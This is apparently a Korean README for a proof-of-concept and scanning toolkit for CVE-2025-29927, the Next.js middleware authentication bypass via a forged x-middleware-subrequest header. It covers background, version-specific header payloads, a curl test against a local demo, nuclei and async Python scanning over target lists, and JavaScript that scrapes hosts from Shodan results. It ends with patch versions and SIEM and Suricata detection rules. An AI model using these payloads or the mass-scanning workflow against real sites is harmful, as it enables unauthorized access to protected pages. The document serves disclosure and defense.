
CVE-2025-29927에 대한 개념 증명 및 대량 스캔 도구 키트로, 위조된 x-middleware-subrequest 헤더를 통한 Next.js 미들웨어 인증 우회입니다. nuclei 템플릿과 Python 스캐너를 포함합니다.
요약: Next.js 미들웨어에서
x-middleware-subrequest헤더 변조를 통해 인증 검사를 우회할 수 있는 취약점.
shodan에서 필터 http.headers:"x-middleware-rewrite"로 검색하여 1000개 도메인 목록을 가져왔습니다.
var ipElements=document.querySelectorAll('strong'),ips=[],domains=[];ipElements.forEach(function(e){var t=e.innerHTML.replace(/['"]/g,'').trim();/^(\d{1,3}.){3}\d{1,3}$/.test(t)?ips.push(t):/^(?!\d+.)[a-zA-Z0-9.-]+.[a-zA-Z]{2,}$/.test(t)&&domains.push(t)});var dataString='IPs:\n'+ips.join('\n')+'\n\nDomains:\n'+domains.join('\n'),a=document.createElement('a');a.href='data:text/plain;charset=utf-8,'+encodeURIComponent(dataString);a.download='domains.txt';document.body.appendChild(a);a.click();
var ipElements=document.querySelectorAll('strong');var ips=[];ipElements.forEach(function(e){ips.push(e.innerHTML.replace(/["']/g,''))});var ipsString=ips.join('\n');var a=document.createElement('a');a.href='data:text/plain;charset=utf-8,'+encodeURIComponent(ipsString);a.download='ip.txt';document.body.appendChild(a);a.click();
맥락과 배경 초기 Next.js 미들웨어는 애플리케이션 자체에 내부 (sub-)요청을 보낼 수 있었습니다. 재귀를 방지하기 위해 프레임워크는 내부 마커인 HTTP 헤더를 도입하여 "이 요청은 이미 처리됨"을 표시했습니다. 이러한 접근 방식은 실용적이었고 미들웨어 파이프라인 내에서 무한 루프를 피할 수 있었습니다.
미들웨어 진화 및 페이로드 Next.js 12.2 이전에는 미들웨어가 pages/ 내에 _middleware로 위치하며 중첩될 수 있었습니다(pages/_middleware, pages/dashboard/_middleware 등). 페이로드는 특정 경로를 지정할 수 있었습니다(x-middleware-subrequest: pages/dashboard/_middleware). 12.2부터 미들웨어는 middleware.js/ts로 명명되고 pages/ 밖에 위치하게 되었습니다. 이 경우 간단한 페이로드 x-middleware-subrequest: middleware (또는 src/를 사용할 경우 src/middleware)가 종종 작동했습니다. 최신 버전(≥ 13.2.0)에서는 MAX_RECURSION_DEPTH를 포함한 추가 검사가 도입되었으며, 일부 우회에서는 middleware:middleware:...와 같은 반복 값을 사용하여 중첩 체인을 모방했습니다. 실제로: 페이로드의 정확한 형식은 Next.js 버전과 프로젝트 구조에 따라 다릅니다.
수정 이력 및 x-middleware-subrequest-id 문제 초기 빠른 패치는 내부 식별자 x-middleware-subrequest-id를 도입하여 런타임에 생성 및 검증함으로써 유효한 내부 하위 요청과 위조를 구별하려고 했습니다. 그러나 구현 결과 이 내부 ID가 외부로 유출될 수 있는 부작용이 발생했습니다(outgoing fetch/요청에 포함됨). 이는 새로운 위험을 만들었습니다. 또한 여러 CDN/PoP 및 혼합 런타임(Edge vs Node) 환경에서 ID 서명/동기화가 불안정한 것으로 나타났습니다. 결국 x-middleware-subrequest-id 코드는 제거/재작업되었습니다. 최종 해결책은 Next.js 패치와 플랫폼 수준의 완화 조치(ingress/edge에서 들어오는 내부 헤더 필터링)의 조합입니다.
CVE-2025-29927x-middleware-subrequest를 부적절하게 신뢰합니다. 외부 클라이언트가 이 헤더를 설정하여 액세스 검사를 우회할 수 있습니다.x-middleware-subrequest에 의존하는 오류입니다. 이 필드는 원래 프레임워크 내부 작업용으로 설계되었지만, 외부 요청이 이 헤더를 설정하여 인증을 우회할 수 있습니다.다음 버전 범위가 영향을 받습니다:
>= 11.1.4 및 < 12.3.5>= 13.0.0 및 < 13.5.9>= 14.0.0 및 < 14.2.25>= 15.0.0 및 < 15.2.39.1 (CRITICAL)CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:Ngit clone https://github.com/<author>/vulnerable-nextjs-demo.git
cd vulnerable-nextjs-demo
npm install
npm run dev
# 헤더 없음 — 거부 예상 (302/307/401/403)
curl -si http://localhost:3000/protected | head -n 20
# 위조 헤더 — 취약할 경우 200 + 본문 반환
curl -si -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \ http://localhost:3000/protected | head -n 20
/_next/static/, package.json, headers, favicon hash) — 안전 모드.x-middleware-subrequest와 함께 GET을 보내고 응답을 비교합니다. 반드시 rate-limit 및 throttle 사용.실행 명령 (예시):
# passive
nuclei -t cves/2025/CVE-2025-29927-passive.yaml -l targets.txt
# active (통제된 방식)
nuclei -t cves/2025/CVE-2025-29927-active.yaml -l targets.txt -c 10 -rate-limit 20
x-middleware-subrequest 헤더로 반복 → 상태 및 본문 비교.--concurrency, --delay, --dry-run, --respect-robots.aiohttp / asyncio 사용.짧은 의사 코드:
async def probe(url):
r1 = await session.get(url)
r2 = await session.get(url, headers={"x-middleware-subrequest": "1"})
if significant_difference(r1, r2):
report_vulnerable(url)
>= 12.3.5, >= 13.5.9, >= 14.2.25, >= 15.2.3.x-middleware-subrequest 헤더 제거/정리:규칙/알림 예시:
SIEM: source.ip가 trusted_proxies가 아닌 경우 들어오는 요청에 x-middleware-subrequest가 있으면 알림.
Suricata (의사):
alert http any any -> any any (msg:"External request with X-Middleware-Subrequest"; http.header; content:"x-middleware-subrequest"; sid:1000001; rev:1;)
alert if request.headers contains "x-middleware-subrequest" AND source.ip not in trusted_proxies
https://github.com/<author>/CVE-2025-29927-POChttps://github.com/<author>/vulnerable-nextjs-demo